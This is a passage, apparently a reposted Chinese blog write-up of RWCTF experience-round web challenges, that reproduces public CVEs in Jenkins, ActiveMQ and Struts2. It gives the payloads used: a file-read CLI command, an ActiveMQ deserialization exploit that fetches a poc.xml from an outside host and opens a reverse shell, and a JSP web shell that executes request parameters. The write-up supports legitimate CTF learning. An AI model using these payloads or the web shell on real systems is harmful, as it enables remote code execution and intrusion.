0


【Web】小白也能做的RWCTF体验赛baby题部分wp

遇到不会的题,怎么办!有的师傅告诉你完了,废了,寄了!只有Z3告诉你,稳辣!稳辣!都稳辣!

这种CVE复现的题型,不可能要求选手从0到1进行0day挖掘,其实考察的还是nday利用能力,我们需要快速进行信息检索并大致理解exp过程,赛后消化这些CVE,至少做到简单积累。

①Be-a-Security-Researcher(CVE-2024-23897)

进来页面是这样的,一般都是套的框架,出题不至于重写。

起手就是一个搜索Jenkins CVE 2024

发现是CVE-2024-23897,下一步就嘎嘎一顿搜就好,找到自己能看懂的文章,进行CVE复现。

CVE-2024-23897&&CVE-2024-23898分析

payload:

java.exe -jar .\jenkins-cli.jar -s http://47.96.171.129:8080/  -webSocket who-am-i "@/flag"

②Be-an-ActiveMq-Hacker(CVE-2023-46604)

虽然这题归在pwn里了,但兴趣使然瞄了一眼,发现直接给出CVE编号了,这不做了看看(

一顿搜就是

ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604)

文章讲的很详细了,改个poc就可

payload:

nc-lvnp 1337

python3 -m http.server 3009

python3 poc.py 120.26.63.137 61616 http://124.222.136.33:3009/poc.xml

先起个服务器,把poc.xml放在3309端口

成功反弹shell,权限不够,直接./readflag

③Be-More-Elegant(CVE-2023-50164)

这题是文件上传,抓包看响应头,妥了,是jsp写shell

S2-066版本太高,我的漏扫工具都扫不出来(,之后是队里师傅试出来的,总之就是找新不找旧,找距今较新披露的jsp文件上传漏洞CVE吧。

这题考的是Apache Struts2 文件上传漏洞分析(CVE-2023-50164)

因为是公用靶机,写jsp文件记得要加个密码。

<%
    if("0x401".equals(request.getParameter("pwd"))){
        java.io.InputStream in =
Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

fileUpload的f先小写传一次,会上传成功,然后再改成大写F,会覆盖先前路径,实现目录穿越

成功写shell

标签: realworldCTF RWCTF web

本文转载自: https://blog.csdn.net/uuzeray/article/details/135891580
版权归原作者 Z3r4y 所有, 如有侵权,请联系我们删除。

“【Web】小白也能做的RWCTF体验赛baby题部分wp”的评论:

还没有评论